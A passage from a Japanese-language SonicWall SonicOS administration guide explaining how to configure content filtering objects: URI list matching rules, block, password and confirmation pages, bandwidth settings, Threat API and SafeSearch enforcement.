例えば、 URI リストオブジェクト example.*.com は次の URI のいずれにも一致します。

• example.exam1.com

• example.exam1.exam2.com

• www.example.exam1.com/path

この URI リストオブジェクトは次の URI には一致しません。

• example.com

これは、ワイルドカード文字 (*) が example.com に存在しない有効なトークン系列を表しているた

めです。

IPv6 アドレスの照合

IPv6 アドレス文字列の照合もサポートされています。 IPv4 アドレスは標準のトークン系列として処理

できますが、 IPv6 アドレス文字列は特別な処理を必要とします。 URI リストオブジェクトに [2001:2002::2008] のような URI が含まれている場合、この URI リストオブジェクトは次のよう

に定義された URI に一致します。

[2001:2002::2008][/<トークン系列>]


• [2001:2002::2008]

• [2001:2002::2008]/path

• [2001:2002::2008]/path/abc.txt

IPv6 のワイルドカード照合

IPv6 アドレス文字列ではワイルドカード照合がサポートされています。リストオブジェクトに

[2001:2002:*:2008]/*/abc.mp3 のような URI が含まれている場合、このリストオブジェクトは

次のように定義された URI に一致します。

[2001:2002:<トークン系列>:2008]/<トークン系列>/abc.mp3


• [2001:2002:2003::2007:2008]/path/abc.txt

• [2001:2002:2003:2004:2005:2006:2007:2008]/path/path2/abc.txt

URI リストオブジェクトの使用

現在、 URI リストオブジェクトは、次のフィールドで使用できます。

• CFS プロファイルの許可 URI リスト

• CFS プロファイルの禁止 URI リスト

• Websense の除外するウェブドメイン



CFS URI リストオブジェクトの使用法はこれらのフィールドで異なります。 CFS プロファイルの許可ま

たは禁止 URI リストで使用する場合、 CFS URI リストオブジェクトは通常どおりに動作します。例え

ば、リストオブジェクトに example.com/path/abc.txt のような URI が含まれている場合、その

リストオブジェクトは次のように定義された URI に一致します。

[<トークン系列>(.|/)] example.com/path/abc.txt[(.|/)<トークン系列>]

Websense の除外するウェブドメインで使用される場合は、 URI のホスト部分のみが有効です。例え

ば、 URI リストオブジェクトに上記のものと同じ example.com/path/abc.txt という URI が含ま

れている場合、そのリストオブジェクトはトークン系列 example.com が含まれているすべてのドメイ

ンに一致します。 URI のパス部分は無視されます。

CFS 動作オブジェクトについて

CFS 動作オブジェクトは、パケットが CFS によってフィルタリングされた後の動作を定義し、 CFS ポリ

シーと一致します。

CFS プロファイルオブジェクトについて

CFS プロファイルオブジェクトは、各 HTTP/HTTPS 接続に対してトリガされる動作を定義します。

パスワード機能についてパスワード機能は、確認機能と連携し、パスワードに基づいてウェブへのアクセスを制限します。禁止 URI リストの特別な URI 種別またはドメインを考慮して、パスワード操作を設定することができま

す。禁止された URI にアクセスするには、正しいパスワードを入力するように求められます。そうし

ないと、ウェブアクセスがブロックされます。

確認機能については、確認機能について (232 ページ) を参照してください。

パスワード操作は、次の仕組みで機能します。

1 ユーザが制限されたウェブサイトへのアクセスを試みます。

2 「パスワード」ページがユーザのブラウザに表示されます。

3 ユーザは、パスフレーズまたはパスワードを入力して送信する必要があります。

4 CFS が送信されたパスフレーズ/パスワードをウェブサイトのパスワードと照合します。

• パスフレーズ/パスワードが一致すると、ウェブアクセスは許可されます。これ以上の確

認は不要です。確認機能に対して設定されている「動作時間」の間、ユーザは引き続き同じ種別のウェブサイトにアクセスできます。既定値は 60 分です。

• パスフレーズ/パスワードが一致しない場合、アクセスは遮断され、「遮断」ページがユー

ザに送信されます。

ユーザが「キャンセル」を選択すると、サイトはただちに遮断されます。

重要：パスワードは、 HTTP 要求に対してのみ機能します。 HTTPS 要求はパスフレーズページに

はリダイレクトできません。

メモ：ユーザがパスフレーズ/パスワードを入力できるのは 3 回までです。すべて

失敗するとサイトは遮断されます。



確認機能について確認機能 (規約とも呼ばれます) は、アクセスを許可する前にユーザに確認を求めることにより、ウェ

ブアクセスを制限します。特別な URI 種別またはドメインを考慮して、確認操作を設定する必要があ

ります。また、ユーザは、こうした URI 種別またはドメインへの初のアクセス時にウェブ要求の確

認を行うことができます。

確認操作は、次の仕組みで機能します。

1 ユーザが遮断されたウェブサイトへのアクセスを試みます。

2 確認を要求するポップアップダイアログが表示されます。

3 ユーザは「継続」または「閉じる」を選択すると必要があります。

• この種別のウェブサイトへのアクセスを求めていることを確認した場合、ユーザは確認の対象となった初のウェブサイトにリダイレクトされます。これ以上の確認は不要です。確認機能に対して設定されている「動作時間」の間、ユーザは引き続き同じ種別のウェブサイトにアクセスできます。既定値は 60 分です。

• 「閉じる」を選択した場合、ユーザには「遮断」ページが表示され、設定されている動作時間の間、その種別のウェブサイトから遮断されます。

URI リストオブジェクトの管理

トピック :

• URI リストオブジェクトテーブルについて (232 ページ)

• URI リストオブジェクトの設定 (233 ページ)

• URI リストオブジェクトのエクスポート (236 ページ)

• URI リストオブジェクトの編集 (238 ページ)

• URI リストオブジェクトの削除 (239 ページ)

URI リストオブジェクトテーブルについて

重要：確認は、 HTTP 要求に対してのみ機能します。 HTTPS 要求は、「確認」 (同意) ページには

リダイレクトできません。

名前 URI リストオブジェクトの名前。

URI リスト URI リストオブジェクトの URI を指定します。

キーワードリスト

URI リストオブジェクトで設定されたキーワードを指定します。

設定テーブルの各項目に対する「編集」アイコンと「削除」アイコンがあります。



URI リストオブジェクトの設定

URI リストオブジェクトを設定するには:

1 管理ビューで、「ポリシー | オブジェクト > コンテンツフィルタオブジェクト」に移動します。

2 必要に応じて、「URI リストオブジェクト」ボタンを選択して、「URI リストオブジェクト」


3 ページの上部にある「追加」を選択します。

「CFS URI リストオブジェクト」ダイアログが表示されます。

4 この URI リストオブジェクトに付けるわかりやすい名前を「名前」フィールドに入力します。

5 URI を追加するか、ファイルから URI をインポートすることができます。これを行うには、次の

手順に従います。

• URI を追加する場合は、手順 6 に進みます。

• URI をインポートする場合は、手順 10 に進みます。

6 URI を手動で追加するには、「追加」を選択します。「URI の追加」ダイアログが表示されます。



7 URI を入力し、「保存」を選択します。 URI 要件については、 URI と URI リストについて (228 ペー

ジ) を参照してください。

8 すべての URI を追加するまで、手順 6 と手順 7 の操作を繰り返します。

9 インポートの手順をスキップするには、手順 21 に移動します。ファイルから URI をインポート

すると、手動で追加された URI はすべて上書きされます。

10 「インポート」を選択して、テキストファイルから URI のリストをインポートします。確認メッ

セージが表示されます。

テキストファイル内の URI は、 Enter または Return を押すことによって追加されるこれらの区

切り文字のいずれかで区切ることができます。

ファイル内の初の 2000 件の有効な URI だけがインポートされます。無効な URI はスキップさ

れ、 1 つの URI リストオブジェクトにつき 2000 件という URI の大数にはカウントされません。

11 確認するには「OK」を選択してください。「ファイルのアップロード」ダイアログが表示され

ます。

12 ファイルを選択し、「開く」を選択します。「URI リスト」テーブルに情報が設定されます。

「追加」ボタンを使用してすでに追加されていた URI は、インポートされたファイルの URI に置き換えられます。

重要：ファイルは、 URI と URI リストについて (228 ページ) に記載されている条件に準拠

している必要があります。

区切り文字スタイル

\r\n Windows スタイルの改行文字

\r Mac OS スタイルの改行文字

\n UNIX スタイルの改行文字



13 「URI リスト」に URI を追加し終えたら、オプションで「キーワードリスト」を選択してキーワー

ドを追加します。

キーワードとキーワードリストについては、キーワードとキーワードリストについて (228ページ) を参照してください。

14 手動でキーワードを追加するには、「追加」を選択します。「キーワードの追加」ダイアログが表示されます。

15 フィールドにキーワードを入力または貼り付け、「保存」を選択します。

16 すべてのキーワードを追加するまで、手順 14 と手順 15 の操作を繰り返します。

17 手動でキーワードを追加するのではなく、テキストファイルからキーワードリストをインポー

トするには、「インポート」を選択します。確認メッセージが表示されます。



18 確認するには「OK」を選択してください。「ファイルのアップロード」ダイアログが表示され

ます。

19 ファイルを選択し、「開く」を選択します。「キーワードリスト」テーブルが読み込まれます。

「追加」ボタンを使用して既に追加されたキーワードは、インポートされたファイルのキーワードに置き換えられます。

20 URI とキーワードの追加が終了したら、「CFS URI リストオブジェクトの追加」ダイアログで

「OK」を選択します。

21 「追加」を選択します。「URI リストオブジェクト」テーブルに情報が設定されます。

22 「キャンセル」を選択して、「CFS URI リストオブジェクトの追加」ダイアログを閉じます。

URI リストオブジェクトのエクスポート

URI リストオブジェクトをエクスポートするには:




3 エクスポートするリストオブジェクトの「設定」アイコンをクリックします。



「CFS URI リストオブジェクトの編集」ダイアログが表示されます。

4 「エクスポート」を選択します。「customizedUriList.rtf を開く」ダイアログが表示されます。

5 ファイルを開く (既定のプログラムはメモ帳)、または保存することができます。次のようにし

ます。



• ファイルを開いた場合、すべてのエントリが 1 行に表示されます。

• ファイルを保存した場合、ファイルは Downloads フォルダに customizedUriList.rtfというファイル名でダウンロードされます。このファイルでは、各エントリの後に改行文字が追加されます。


URI リストオブジェクトの編集

URI リストオブジェクトを編集するには:




3 編集するリストオブジェクトの「設定」アイコンをクリックします。「CFS URI リストオブジェ

クトの編集」ダイアログが表示されます。

4 次の操作が可能です。

• 「URI リスト」テーブルでエントリの「削除」 (X) アイコンを選択すると、そのエントリを

削除できます。

• テーブルからすべてのエントリを削除するには、「すべて削除」をクリックします。確認のダイアログで、「OK」を選択します。



「CFS URI リストオブジェクトの編集」ダイアログで「OK」を選択すると、「URI リスト」

テーブルに少なくとも 1 つのエントリが残っている必要があることを示すメッセージが

表示されます。次のどちらかを行います。

• 1 つ以上のエントリをテーブルに追加します。

• ファイルからエントリをインポートします。

• 「キャンセル」を選択し、別の方法を試みてください。

• 「編集」アイコンをクリックして、エントリを編集します。「URI の編集」ダイアログが


1) URI に変更を加えます。

2) 「保存」を選択します。「URI リスト」テーブルの情報が更新されます。

5 「CFS URI リストオブジェクトの編集」ダイアログで「OK」を選択します。

URI リストオブジェクトの削除

URI リストオブジェクトを削除するには:


2 必要に応じて、「URI リストオブジェクト」ボタンを選択して、「URI リストオブジェクト」画


3 次のいずれかを行います。

• 削除するリストオブジェクトの「削除」アイコンをクリックします。

• 削除する 1 つ以上のリストオブジェクトのチェックボックスをオンにします。「削除」

ボタンを選択し、「選択した項目の削除」を選択します。

すべての URI リストオブジェクトを削除するには:

1 「削除」ボタンを選択し、「すべて削除」を選択します。



CFS 動作オブジェクトの管理

トピック :

• CFS 動作オブジェクトテーブルについて (240 ページ)

• CFS 動作オブジェクトの設定 (240 ページ)

• CFS 動作オブジェクトの編集 (250 ページ)

• CFS 動作オブジェクトの削除 (250 ページ)

CFS 動作オブジェクトテーブルについて

CFS 動作オブジェクトの設定

既定の CFS 動作オブジェクトである CFS Default Action は、 SonicOS によって作成されます。この CFS動作オブジェクトは、設定および編集は可能ですが、削除することはできません。

CFS 動作オブジェクトを設定するには:


2 「CFS 動作オブジェクト」ボタンを選択して、「CFS 動作オブジェクト」画面を表示します。

名前CFS 動作オブジェクトの名前。既定の名前は "CFS Default Action" です。既定のオブ

ジェクトは編集可能ですが、削除はできません。

遮断「遮断」ページが「設定済み」であるかどうかを示します。

パスワード「パスフレーズ」ページが「設定済み」であるかどうかを示します。

確認「確認」ページが「設定済み」であるかどうかを示します。

帯域幅管理「帯域幅管理」ページが「設定済み」であるかどうかを示します。




3 ページの上部にある「追加」を選択します。「CFS 動作オブジェクト」ダイアログが表示され

ます。

4 「名前」フィールドに CFS 動作オブジェクトの名前を設定します。

5 プライバシーを保護するために Cookie を自動的に削除するには、「Cookie の消去」チェックボッ

クスをオンにします。このオプションとクライアント DPI-SSL コンテンツフィルタの両方が有

効になっていると、 HTTPS サイトの Cookie が削除されます。このオプションは、既定では選択

されていません。

6 AppFlow 監視に URI 情報を送信するには、「フロー報告を有効にする」チェックボックスを選択

します。このオプションは、既定では選択されています。

7 サイトが遮断されたときにどのページを表示するかを、以下のように設定できます。

• 会社別の遮断サイトポリシーの場合は、遮断オプション (242 ページ) に進みます。

重要：このオプションを有効にすると、一部の検索エンジンのセーフサーチ強制機能が

侵害されることがあります。

メモ：これらのページには、既定のバージョンが作成済みです。既定のページを使用するほかに、必要に応じてそれを変更したり、新しいページを作成したりすることができます。



• パスワードで保護されたウェブページの場合は、パスフレーズオプション (243 ページ)に進みます。

• ユーザが表示する前に確認が求められる制限ウェブページの場合は、確認オプション

(245 ページ) に進みます。

• 脅威 API 強制による遮断サイトの場合は、脅威 API オプション (249 ページ) に進みます。

8 帯域幅リソースを CFS 動作オブジェクトの一部として割り当てることができます。詳細について

は、 BWM オプション (247 ページ) を参照してください。

9 「OK」を選択します。新しい CFS 動作オブジェクトが「CFS 動作オブジェクト」テーブルに追加

されます。

10 「キャンセル」を選択して、「CFS 動作オブジェクトの追加」ダイアログを閉じます。

遮断オプション

「CFS 動作オブジェクトの追加」ダイアログにこの画面が表示されます。ダイアログを開くには、管

理ビューを選択し、「ポリシー | オブジェクト > コンテンツフィルタオブジェクト」を開き、「CFS動作オブジェクト」ボタンを選択して「CFS 動作オブジェクト」画面を表示し、ページ上部の「追

加」ボタンを選択します。

サイトが遮断されたときに表示されるページを作成するには:

1 「操作設定」で、「遮断」ボタンを選択します。



既定のページが既に定義されていますが、遮断されたサイトにアクセスしようとしたときにユーザに表示されるウェブページは全面的にカスタマイズできます。または、ページを独自に

作成することもできます。

2 プレビューを表示するには、「プレビュー」ボタンを選択します。

3 確認のダイアログで、「OK」を選択します。

4 与えられたコードを変更していなければ、「プレビュー」ボタンを選択すると既定のウェブ

ページが表示されます。遮断ポリシー、クライアント IP アドレス、および遮断理由が次のよう

に示されます。

プレビューを見終わったら、「X」を選択してウィンドウを閉じます。

「遮断ページ」フィールドからすべてのコンテンツを削除するには、「クリア」ボタンを選択します。

既定の遮断ページメッセージに戻すには、「既定」ボタンを選択します。

パスフレーズオプション




メモ：パスワード機能については、パスワード機能について (231 ページ) を参照してください。



パスワードで保護されたウェブページを作成するには:

1 「操作設定」で、「パスフレーズ」ボタンを選択します。

2 「パスワードの入力」フィールドに、ウェブサイトのパスフレーズ /パスワードを入力します。

パスワードは大 64 文字です。

3 「パスワードの確認」フィールドに同じパスフレーズ/パスワードを再入力します。

4 入力中のパスワードを隠すには、「パスワードを隠す」チェックボックスを選択します。このオプションは、既定では選択されています。

5 種別またはドメインに基づくパスフレーズの有効時間を「動作時間 (分)」フィールドに入力し

ます。時間の小値は 1 分、大値は 9999 分、既定値は 60 分です。

6 既定のページが既に定義されていますが、遮断されたサイトにアクセスしようとしたときにユーザに表示されるウェブページは全面的にカスタマイズできます。または、ページを独自に

作成することもできます。サイトが遮断されたときに表示されるページを作成するには:

• プレビューを表示するには、「プレビュー」ボタンを選択します。

• 確認のダイアログで、「OK」を選択します。

重要：このオプションの選択を外すと、パスワードが通常の文字のまま表示され、「パスワードの確認」フィールドの入力が無効になります。



与えられたコードを変更していなければ、「プレビュー」ボタンを選択すると既定のウェブページが表示されます。ウェブサイトの URL、クライアント IP アドレス、ポリ

シー、理由、および動作分数が、パスワード入力用フィールドと共に表示されます。

• 「パスワードページ」フィールドからすべてのコンテンツを削除するには、「クリア」

ボタンを選択します。

• 既定のパスフレーズページメッセージに戻すには、「既定」ボタンを選択します。

確認オプション




メモ：確認 (同意) の要求は、 HTTP 要求に対してのみ機能します。 HTTPS 要求は、「確認」ペー

ジにはリダイレクトできません。詳細については、確認機能について (232 ページ) を参照してく

ださい。



ユーザが表示する前に確認が求められる制限ウェブページを作成するには:

1 「操作設定」で、「確認」ボタンを選択します。

2 種別またはドメインに基づく確認済みユーザの有効時間を「動作時間 (分)」フィールドに入力し

ます。時間の小値は 1 分、大値は 9999 分、既定値は 60 分です。

3 既定のページが既に定義されていますが、確認サイトにアクセスしようとしたときにユーザに表示されるウェブページは全面的にカスタマイズできます。または、ページを独自に作成する

こともできます。サイトが遮断されたときに表示されるページを作成するには:



与えられたコードを変更していなければ、「プレビュー」ボタンを選択すると既定のウェブページが表示されます。ウェブサイトの URL、クライアント IP アドレス、遮断ポ

リシー、および遮断の理由が、確認入力用フィールドと共に表示されます。



• 「脅威 API 遮断ページ」フィールドからすべてのコンテンツを削除するには、「消去」ボ

タンを選択します。

• 既定の遮断ページメッセージに戻すには、「既定」ボタンを選択します。

BWM オプション




コンテンツフィルタリングに使う帯域幅リソースを割り当てるには:

1 「操作設定」で、「帯域幅管理」ボタンを選択します。

重要： CFS 動作帯域幅オブジェクトは、「オブジェクト > 帯域幅オブジェクト」ページで作成され

る帯域幅オブジェクトと似ていますが、同じものではありません。 CFS 動作 BWM オブジェクト

は、「オブジェクト > 帯域幅オブジェクト」ページに表示されません。また、 BWM 帯域幅オブ

ジェクトは、「オブジェクト > コンテンツフィルタオブジェクト」ページに表示されません。

メモ：帯域幅管理の情報については、「SonicOS セキュリティ設定」の技術文書の「ファイア

ウォール設定 > 帯域幅管理」の下の「帯域幅の設定」セクションを参照してください。帯域幅

管理オブジェクトについては、帯域幅オブジェクトの設定 (219 ページ) を参照してください。

重要： CFS 動作帯域幅オブジェクトを作成するには、帯域幅管理を有効にする必要があります。



2 「帯域幅統合方式」ドロップダウンメニューから、 BWM オブジェクトを適用する方法を選択し

ます。

• ポリシー毎 (既定)

• 動作毎

3 送信トラフィックで BWM を有効にするには、「送信帯域幅管理を有効にする」チェックボック

スをオンにします。このオプションは、既定では選択されていません。

「帯域幅オブジェクト」ドロップダウンメニューと「帯域幅使用状況の追跡を有効にする」

チェックボックスが有効になります。

a 「帯域幅オブジェクト」ドロップダウンメニューで、次のどちらかを選択します。

• 既存の BWM オブジェクト。

• 「帯域幅オブジェクトの作成」。「帯域幅オブジェクトの追加」ダイアログが表示されます。新しい帯域幅オブジェクトの作成については、帯域幅オブジェクトの設定 (220 ページ) を参照してください。

4 受信トラフィックで BWM を有効にするには、「受信帯域幅管理を有効にする」チェックボック

スをオンにします。このオプションは、既定では選択されていません。

「帯域幅オブジェクト」ドロップダウンメニューが有効になります。

a 「帯域幅オブジェクト」ドロップダウンメニューで、次のどちらかを選択します。

• 既存の BWM オブジェクト。

• 「帯域幅オブジェクトの作成」。「帯域幅オブジェクトの追加」ダイアログが表示されます。新しい帯域幅オブジェクトの作成については、帯域幅オブジェクトの設定 (220 ページ) を参照してください。

5 帯域幅使用状況を追跡にするには、「帯域幅使用状況の追跡を有効にする」チェックボックスをオンにします。このオプションは、既定では選択されていません。

メモ：「送信帯域幅管理を有効にする」または「受信帯域幅管理を有効にする」 (またはこ

の両方) を選択し、「帯域幅使用状況の追跡を有効にする」を有効にする必要があります。



脅威 API オプション




脅威リストに含まれる URL を遮断するポリシーを追加するには:

1 「操作設定」で、「脅威 API」ボタンを選択します。

2 既定のページが既に定義されていますが、遮断されたサイトにアクセスしようとしたときにユーザに表示されるウェブページは全面的にカスタマイズできます。または、ページを独自に

作成することもできます。サイトが遮断されたときに表示されるページを作成するには:



重要：脅威 API は、設定前に有効にする必要があります。脅威 API とその有効化方法の詳細につ

いては、『SonicOS Threat API Reference Guide』を参照してください。



与えられたコードを変更していなければ、「プレビュー」ボタンを選択すると既定のウェブページが表示されます。ウェブサイトの URL、クライアント IP アドレス、遮断ポ

リシー、および遮断の理由が、確認入力用フィールドと共に表示されます。

• 「脅威 API 遮断ページ」フィールドからすべてのコンテンツを削除するには、「消去」ボ

タンを選択します。

• 既定の確認ページメッセージに戻すには、「既定」ボタンを選択します。

CFS 動作オブジェクトの編集

CFS 動作オブジェクトを編集するには:



3 編集する CFS 動作オブジェクトの「編集」アイコンをクリックします。「CFS 動作オブジェクト

の編集」ダイアログが表示されます。このダイアログは、「CFS 動作オブジェクトの追加」ダ

イアログと同じです。

4 変更を行うには、 CFS 動作オブジェクトの設定 (240 ページ) の説明に従ってください。

CFS 動作オブジェクトの削除

CFS 動作オブジェクトを削除するには:




• 削除する動作オブジェクトの「削除」アイコンをクリックします。

• 削除する 1 つ以上の動作オブジェクトのチェックボックスをオンにします。「削除」ボタ

ンを選択し、「選択した項目の削除」を選択します。

すべての CFS 動作オブジェクトを削除するには:

1 「削除」ボタンを選択し、「すべて削除」を選択します。既定のオブジェクトである CFS DefaultAction を除き、すべての CFS 動作オブジェクトが削除されます。



CFS プロファイルオブジェクトの管理

トピック :

• CFS プロファイルオブジェクトテーブルについて (251 ページ)

• CFS プロファイルオブジェクトの設定 (252 ページ)

• CFS プロファイルオブジェクトの編集 (257 ページ)

• CFS プロファイルオブジェクトの削除 (257 ページ)

CFS プロファイルオブジェクトテーブルについて

名前CFS プロファイルオブジェクトの名前。既定の名前は CFS Default Profile です。既定のオブジェクトは編集可能ですが、削除はできません。

許可 URI リスト許可リストに記載された URI リストオブジェクトの名前。

禁止 URI リスト禁止リストに記載された URI リストオブジェクトの名前。

遮断種別 CFS プロファイルオブジェクトによって遮断されるすべての種別の名前。

パスワード種別CFS プロファイルオブジェクトによってパスワードが要求されるすべての種

別の名前。

確認種別CFS プロファイルオブジェクトによって確認が要求されるすべての種別の

名前。

帯域幅管理種別この CFS プロファイルオブジェクトによって制御される帯域幅管理のすべて

の種別の名前。

許可種別 CFS プロファイルオブジェクトによって許可されるすべての種別の名前。




CFS プロファイルオブジェクトの設定

既定の CFS プロファイルオブジェクトである CFS Default Profile は、 SonicOS によって作成されます。

この CFS プロファイルオブジェクトは、設定および編集は可能ですが、削除することはできません。

CFS プロファイルオブジェクトの設定:


2 「CFS プロファイルオブジェクト」ボタンを選択して、「CFS プロファイルオブジェクト」画面


3 ページの上部にある「追加」ボタンを選択します。「CFS プロファイルオブジェクトの追加」


4 「設定」画面で、「名前」フィールドに CFS プロファイルオブジェクトの名前を入力します。



5 「許可 URI リスト」ドロップダウンメニューから、無制限のアクセスを許可する URI が記載され

た URI リストオブジェクトを選択し、このリストをホワイトリストとして扱います。

• 「なし」 (既定)

• URI リストオブジェクトの名前。

• 「新しい URI リストオブジェクトの作成」。このオプションを選択すると、「CFS URI リストオブジェクトの追加」ダイアログが表示されます。 URI リストオブジェクトの作成

方法については、 URI リストオブジェクトの設定 (233 ページ) を参照してください。

6 「禁止 URI リスト」ドロップダウンメニューから、アクセスをいっさい認めない URI が記載され

た URI リストオブジェクトを選択し、このリストをブラックリストとして扱います。

• 「なし」 (既定)

• URI リストオブジェクトの名前。

• 「新しい URI リストオブジェクトの作成」。このオプションを選択すると、「CFS URI リストオブジェクトの追加」ダイアログが表示されます。 URI リストオブジェクトの作成

方法については、 URI リストオブジェクトの設定 (233 ページ) を参照してください。

7 「URI リストの検索順序」ドロップダウンメニューから、フィルタリング中に初に検索される

URI リストを選択します。

• 「許可 URI リストを優先」 (既定)

• 「禁止 URI リストを優先」

8 「禁止 URI リストに対する操作」ドロップダウンメニューから、禁止リストにある URI が出現し

た場合に実行する動作を選択します。

9 「種別の設定」テーブルには、芸術/エンターテイメント、ビジネス、教育、旅行、武器、ショッ

ピングなど、すべての URI 種別が記載されています。種別ごとの動作ではなく、すべての URIに共通して実行される動作を定義できます。リストを下へスクロールしながら、各種別のドロップダウンメニューから動作を選択します。

• すべての種別を同じ動作に変更するには:

1) 「操作」ドロップダウンメニューから動作を選択します。

2) 「すべてに設定」ボタンを選択します。

• すべての種別を既定の動作にリセットするには、「既定」ボタンを選択します。

遮断 (既定)CFS 動作オブジェクト用に設定された遮断ページが、サイトにアクセスしよ

うとしたユーザに表示されます。

確認 CFS 動作オブジェクト用に設定された確認ページが、サイトにアクセスしよ

うとしたユーザに表示されます。ユーザにはアクセスの意思確認が求められます。

パスワード CFS 動作オブジェクト用に設定されたパスワードページが、サイトにアク

セスしようとしたユーザに表示されます。ユーザは、サイトに入るために有効なパスワードを入力する必要があります。

許可遮断帯域幅管理確認パスワード

メモ：既定では、種別 1 ～ 12 および種別 59 が遮断され、残りの種別は許可されています。



10 スマートフィルタとセーフサーチのオプションを有効にするには、「詳細」ボタンを選択し

ます。この画面でオプションを設定する方法については、詳細画面 (254 ページ) を参照してく

ださい。

11 ウェブの時限閲覧に関する規約を設定するには、「時限閲覧規約」ボタンを選択します。この画面でオプションを設定する方法については、規約画面 (255 ページ) を参照してください。

12 「追加」を選択します。「CFS プロファイルオブジェクト」テーブルが更新されます。

13 「キャンセル」を選択して、「CFS プロファイルオブジェクトの追加」ダイアログを閉じます。

詳細画面

この画面は、「CFS プロファイルオブジェクトの追加」ダイアログの 3 つの画面の 1 つです。ダイア

ログを開くには、管理ビューを選択し、「ポリシー | オブジェクト > コンテンツフィルタオブジェ

クト」を開き、「CFS プロファイルオブジェクト」ボタンを選択して「CFS プロファイルオブジェク

ト」画面を表示し、ページ上部の「追加」ボタンを選択します。「詳細設定」を選択します。

1 Google 翻訳 (https://translate.google.com) 内の埋め込み URL を検出し、埋め込み URI をフィルタリングするには、「埋め込み URI に対してスマートフィルタを有効にする」チェック

ボックスをオンにします。

2 以下のウェブサイトのいずれかで検索するときにセーフサーチを適用するには、「セーフサー

チ強制を有効にする」チェックボックスをオンにします。

メモ：既定では、すべてのオプションがオフになっています。

重要：この機能が動作するには、クライアント DPI-SSL のコンテンツフィルタが有効化さ

れている必要があります。

メモ：この機能は、 Google にのみ適用されます。対象となるのは、現在レーティングが

済んでいる埋め込みウェブサイトです。



• www.yahoo.com

• www.ask.com

• www.dogpile.com

• www.lycos.com

3 脅威 API を有効にするには、「脅威 API 強制を有効にする」チェックボックスをオンにします。

4 Google 用のセーフサーチオプションを各 CFS ポリシーとそれに対応する CFS 動作に優先して適用

するには、「「Google セーフサーチ強制」を有効にする」チェックボックスを選択します。

5 YouTube に制限付きモード (安全な検索) でアクセスするには、「「YouTube 制限付きモード」を

有効にする」チェックボックスを選択します。

6 Bing 用のセーフサーチオプションを各 CFS ポリシーとそれに対応する CFS 動作に優先して適用

するには、「「Bing セーフサーチ強制」を有効にする」チェックボックスを選択します。

規約画面

この画面は、「CFS プロファイルオブジェクトの追加」ダイアログの 3 つの画面の 1 つです。ダイア

ログを開くには、管理ビューを選択し、「ポリシー | オブジェクト > コンテンツフィルタオブジェ

クト」を開き、「CFS プロファイルオブジェクト」ボタンを選択して「CFS プロファイルオブジェク

ト」画面を表示し、ページ上部の「追加」ボタンを選択します。次に、「規約」を選択します。

メモ：この強制は、ポリシーレベルでは設定できません。この機能では、 HTTPS サイト

への DNS リダイレクションが使用されるためです。 HTTPS サイトについては、クライアン

ト DPI-SSL コンテンツフィルタが有効化されている必要があります。

メモ： SonicOS が初の脅威リストを受信したときに作成する脅威 URI リストオブジェクト

は、「脅威 API 強制を有効にする」チェックボックスをオンにすることで参照されます。

メモ：通常、セーフサーチは自動的に適用され、 Google によって管理されますが、この

オプションをオンにすると、 SonicOS は DNS 応答の中の Google ドメインを、 Google セー

フサーチ仮想 IP アドレスに書き換えます。

メモ：この機能は、クライアントホストの DNS キャッシュが更新されるまで反映されま

せん。

メモ： YouTube では、ユーザやその他の警告によって報告された不適切なコンテンツを含

む可能性のある動画を除外する新機能が提供されています。この機能が有効化されていると、 SonicOS は YouTube ドメインの DNS 応答をセーフサーチ仮想 IP アドレスに書き換え

ます。


せん。

メモ：この機能が有効化されていると、 SonicOS は Bing ドメインの DNS 応答をセーフ

サーチ仮想 IP アドレスに書き換えます。


せん。

メモ：時限閲覧規約は、 HTTP 要求に対してのみ機能します。 HTTPS 要求は、「確認」 (同意) ペー

ジにはリダイレクトできません。



1 ユーザがアクセス前に同意が必要なサイトを訪れたときに「時限閲覧規約」 (確認) ページを表

示するには、「規約表示を有効にする」チェックボックスを選択します。このオプションは、既定では選択されていません。

このオプションを選択すると、他のオプションが使用できるようになります。

2 「時限閲覧規約」ページが表示される時間の期限をユーザに通知するには、無動作時間の長さを「ユーザ無動作タイムアウト (分)」フィールドに入力します。無動作時間の小値は 1 分、

大値は 9999 分、既定値は 15 分です。

3 規約への同意が必要なウェブサイトにユーザが移動したときにそのユーザをリダイレクトするウェブサイトの URL を「規約選択画面 (検閲の選択)」フィールドに入力します。「時限閲覧規

約」ページは、次の条件を満たす必要があります。

• ウェブサーバ上に存在し、ネットワーク上でユーザが URI を通じてアクセス可能。

• SonicWall 装置内の以下の 2 つのページへのリンクが含まれる。このリンクを選択すると、

ユーザが希望するアクセスの種別がファイアウォールに通知されます。

• フィルタを使用しないアクセス: <装置の LAN IP アドレス>/iAccept.html

• フィルタを使用するアクセス: <装置の LAN IP アドレス>/iAcceptFilter.html

4 強制的な検閲を要求するウェブサイトにユーザが移動したときにそのユーザをリダイレクトするウェブサイトの URL を「規約承諾画面 (検閲を強制にする)」フィールドに入力します。「時

限閲覧規約」ページは、次の条件を満たす必要があります。

• ウェブサーバ上に存在し、ネットワーク上でユーザが URI を通じてアクセス可能。

• SonicWall 装置内の <装置の LAN IP アドレス>/iAcceptFilter.html ページへのリン

クが含まれる。これは、ユーザが閲覧の検閲を承諾することをファイアウォールに通知します。

5 「強制フィルタアドレス」ドロップダウンメニューから、強制的な検閲を要求する設定済み IPアドレスが含まれるアドレスオブジェクトを選択します。

メモ：規約 (確認) ページの設定については、確認オプション (245 ページ) を参照してくだ

さい。



CFS プロファイルオブジェクトの編集

CFS プロファイルオブジェクトを編集するには:




3 編集する CFS プロファイルオブジェクトの「編集」アイコンをクリックします。「CFS プロファ

イルオブジェクトの編集」ダイアログが表示されます。このダイアログは、「CFS プロファイ

ルオブジェクトの追加」ダイアログと同じです。

4 変更を行うには、 CFS プロファイルオブジェクトの設定 (252 ページ) の説明に従ってください。

CFS プロファイルオブジェクトの削除

CFS プロファイルオブジェクトを削除するには:





• 削除するプロファイルオブジェクトの「削除」アイコンをクリックします。

• 削除する 1 つ以上のプロファイルオブジェクトのチェックボックスをオンにします。「削

除」ボタンを選択し、「選択した項目の削除」を選択します。

すべての CFS プロファイルオブジェクトを削除するには:

1 「削除」ボタンを選択し、「すべて削除」を選択します。既定のオブジェクトである CFS DefaultProfile を除き、すべての CFS プロファイルオブジェクトが削除されます。

コンテンツフィルタオブジェクトの適用コンテンツフィルタオブジェクトの設定が終わった後で、オブジェクトをコンテンツフィルタポリ

シーに適用する必要があります。コンテンツフィルタの設定は、「セキュリティの設定 | セキュリ

ティサービス > コンテンツフィルタ」ページで行えます ( 「SonicOS セキュリティ設定」の技術ド

キュメントの「コンテンツフィルタリングサービスの設定」セクションを参照)。




サポート

第 3 部

258

サポート

• SonicWall サポート

12

SonicWall サポート

